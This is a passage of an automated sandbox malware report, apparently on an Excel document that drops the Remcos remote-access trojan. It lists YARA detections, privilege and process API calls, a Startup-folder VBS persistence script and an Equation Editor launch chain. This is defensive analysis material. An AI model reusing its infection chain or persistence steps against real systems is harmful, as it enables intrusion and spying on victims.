          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D6781B6_2_00D6781B
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D619B06_2_00D619B0
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D5997D6_2_00D5997D
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D479206_2_00D47920
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D67A4A6_2_00D67A4A
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D67CA76_2_00D67CA7
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D61C776_2_00D61C77
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D79EEE6_2_00D79EEE
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DCBE446_2_00DCBE44
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D61F326_2_00D61F32
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_001136906_2_00113690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0043E0CC7_2_0043E0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041F0FA7_2_0041F0FA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004541597_2_00454159
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004381687_2_00438168
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004461F07_2_004461F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0043E2FB7_2_0043E2FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0045332B7_2_0045332B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042739D7_2_0042739D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004374E67_2_004374E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0043E5587_2_0043E558
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004387707_2_00438770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004378FE7_2_004378FE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004339467_2_00433946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0044D9C97_2_0044D9C9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00427A467_2_00427A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041DB627_2_0041DB62
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00427BAF7_2_00427BAF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00437D337_2_00437D33
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00435E5E7_2_00435E5E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00426E0E7_2_00426E0E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0043DE9D7_2_0043DE9D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00413FCA7_2_00413FCA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00436FEA7_2_00436FEA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_100171947_2_10017194
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_1000B5C17_2_1000B5C1
          Source: 202404294766578200.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00434E10 appears 54 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00402093 appears 50 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00434770 appears 41 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00401E65 appears 35 times
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: String function: 00A0F9F2 appears 40 times
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: String function: 009F9CB3 appears 31 times
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: String function: 00A10A30 appears 46 times
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: String function: 00D49CB3 appears 31 times
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: String function: 00D60A30 appears 46 times
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: String function: 00D5F9F2 appears 40 times
          Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
          Source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: Process Memory Space: deblaterate.exe PID: 2008, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 1812, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: Process Memory Space: deblaterate.exe PID: 1868, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 920, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: bhvA870.tmp.10.drBinary or memory string: org.slneighbors
          Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLSX@19/18@2/3
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A637B5 GetLastError,FormatMessageW,3_2_00A637B5
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A510BF AdjustTokenPrivileges,CloseHandle,3_2_00A510BF
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A516C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,3_2_00A516C3
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DA10BF AdjustTokenPrivileges,CloseHandle,6_2_00DA10BF
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DA16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_00DA16C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,7_2_00417952
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A651CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,3_2_00A651CD
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A7A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,3_2_00A7A67C
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A6648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,3_2_00A6648E
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_009F42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,3_2_009F42A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_0041AA4A
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$202404294766578200.xlam.xlsxJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-E70NOS
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7879.tmpJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"
          Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: HandleInformationJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: svchost.exe, 00000007.00000002.989123562.0000000002C00000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.816888835.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: svchost.exe, 00000007.00000002.989099681.0000000002A50000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.989123562.0000000002C00000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.816888835.0000000000400000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.827860178.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: svchost.exe, 00000007.00000002.989123562.0000000002C00000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.816888835.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
          Source: svchost.exe, 00000007.00000002.989123562.0000000002C00000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.816888835.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
          Source: svchost.exe, 00000007.00000002.989123562.0000000002C00000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.816888835.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: svchost.exe, 00000007.00000002.989123562.0000000002C00000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.816888835.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: svchost.exe, 00000007.00000002.989123562.0000000002C00000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.816888835.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: 202404294766578200.xlam.xlsxReversingLabs: Detection: 68%
          Source: 202404294766578200.xlam.xlsxVirustotal: Detection: 59%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CKK.exe "C:\Users\user\AppData\Roaming\CKK.exe"
          Source: C:\Users\user\AppData\Roaming\CKK.exeProcess created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\AppData\Roaming\CKK.exe"
